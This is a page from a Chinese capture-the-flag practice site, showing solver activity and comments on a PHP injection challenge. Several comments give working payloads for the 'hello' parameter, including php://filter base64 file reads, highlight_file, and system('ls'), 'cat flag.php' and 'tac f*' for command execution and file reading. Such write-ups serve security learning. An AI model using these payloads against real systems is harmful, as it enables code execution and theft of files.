评分(10)
解题动态
zhaowenxin 攻破了该题 5小时前
yang0000 攻破了该题 14小时前
Biscuitvv 攻破了该题 14小时前
香蕉君 攻破了该题 17小时前
四叠半神话大系 攻破了该题 19小时前
lnboxue 攻破了该题 19小时前
chi 攻破了该题 20小时前
aboic 攻破了该题 23小时前
youbug 攻破了该题 1天前
YYYYHHHHNNNN 攻破了该题 1天前
lance 攻破了该题 1天前
彭彭 攻破了该题 1天前
qwaeawd 攻破了该题 1天前
zzuer 攻破了该题 1天前
chenwei001 攻破了该题 1天前
大大怪将军 攻破了该题 1天前
jcccc 攻破了该题 1天前
17690101466 攻破了该题 1天前
巧屿 攻破了该题 1天前
评论
lins11 14天前
举报
/?hello=file_get_contents(%27php://filter/read=convert.base64-encode/resource=flag.php%27) ->base64解码
叱咤月海鱼鱼猫 1月前
举报
?hello=highlight_file('flag.php')
banfang 2月前
举报
点击场景后将代码发送给豆包等一分钟基本上就可以了
pks0 2月前
举报
?hello=1);highlight_file(%27flag.php%27);//
一个姓⎝李⎠的师傅~ 3月前
举报
知其然,不知其所以然,以后还是不会类似的题目:(下面是我写了 1 天的思路,保证你看完以后一切都明白了!!!) https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#fYY9d
pipipikaqiu 22天前
举报
写的好详细,太好了啊
一个姓⎝李⎠的师傅~ 23天前
举报
@想好思路再支付 有帮助就好,感谢老铁的认可!!!
想好思路再支付 23天前
举报
思路讲的真好啊李师傅
ubudj 3月前
举报
?hello=file(%27flag.php%27) ,%27 是单引号(')的 URL 编码形式。 确保 file() 函数能正确识别要读取的文件名
默认 4月前
举报
hello=a=system('ls'),发现能输出东西,剩下的就是ls换成你想要做的命令,然后试试cat flag.php 这个cat是输出东西的,然后换成其他的东西都行,cat不行就tac,能出来答案 ps:在根目录下有一个叫做flag的文件,这里用 cat /flag 是没有问题的
wywsssf 4月前
举报
找到参数hello,首先?hello=system('ls'),看到flag.php,再执行?hello=system('cat flag.php'),发现无内容,尝试把cat换成tac则成功
dlgz 4月前
举报
?hello=file(%27flag.php%27) ?hello=system(%27tac%20f*%27)
wuzhi唔知 4月前
举报
http://IP:PORT/?hello="<input%20value=%27$flag%27>" ---TEST end